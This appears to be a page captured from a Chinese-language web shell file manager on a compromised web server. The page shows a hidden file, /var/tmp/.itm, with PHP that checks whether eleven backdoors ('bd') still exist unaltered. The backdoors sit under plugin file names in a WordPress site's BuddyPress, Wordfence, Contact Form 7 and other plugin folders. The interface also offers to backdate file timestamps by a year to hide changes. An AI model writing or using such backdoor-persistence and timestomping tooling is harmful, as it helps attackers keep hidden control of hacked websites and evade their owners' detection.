文件操作 - .itm
返回文件管理
返回主菜单
删除本文件
文件: /var/tmp/.itm
编辑文件内容
<?php $r = '/var/www/vec.uaysen.cl/html'; $x = ["/wp-content/plugins/buddypress/bp-templates/bp-nouveau/buddypress/activity/single/copyimage.php"=>"bd@@1270793@@880", "/wp-content/plugins/wordfence2/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/contacts.php"=>"bd@@1278079@@917", "/wp-content/plugins/wp-file-download/app/includes/divi/includes/modules/Category/setting.ini.php"=>"bd@@1270684@@928", "/wp-content/plugins/buddypress/bp-templates/bp-nouveau/buddypress/common/js-templates/invites/method.upgrade.php"=>"bd@@1278126@@886", "/wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/wrapper.php"=>"bd@@1278142@@875", "/wp-content/plugins/buddypress/bp-templates/bp-nouveau/buddypress/common/js-templates/activity/delete_message.php"=>"bd@@1270720@@936", "/wp-content/plugins/wp-file-download/app/admin/views/user/tpl/shsef.php"=>"bd@@1278156@@951", "/wp-content/plugins/wp-file-download/framework/ju-libraries/WPFramework/v1_0_5/Fields/analyze.php"=>"bd@@1270738@@1014", "/wp-content/plugins/wp-file-download/app/site/views/frontviewer/tpl/info_publiclist.php"=>"bd@@1278169@@962", "/wp-content/plugins/buddypress/bp-templates/bp-legacy/buddypress/activity/single/server_import.php"=>"bd@@1270765@@871", "/wp-content/plugins/contact-form-7/includes/js/smilie.class.php"=>"bd@@1268464@@918"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');
修改文件时间
将文件时间修改为当前时间的前一年
删除文件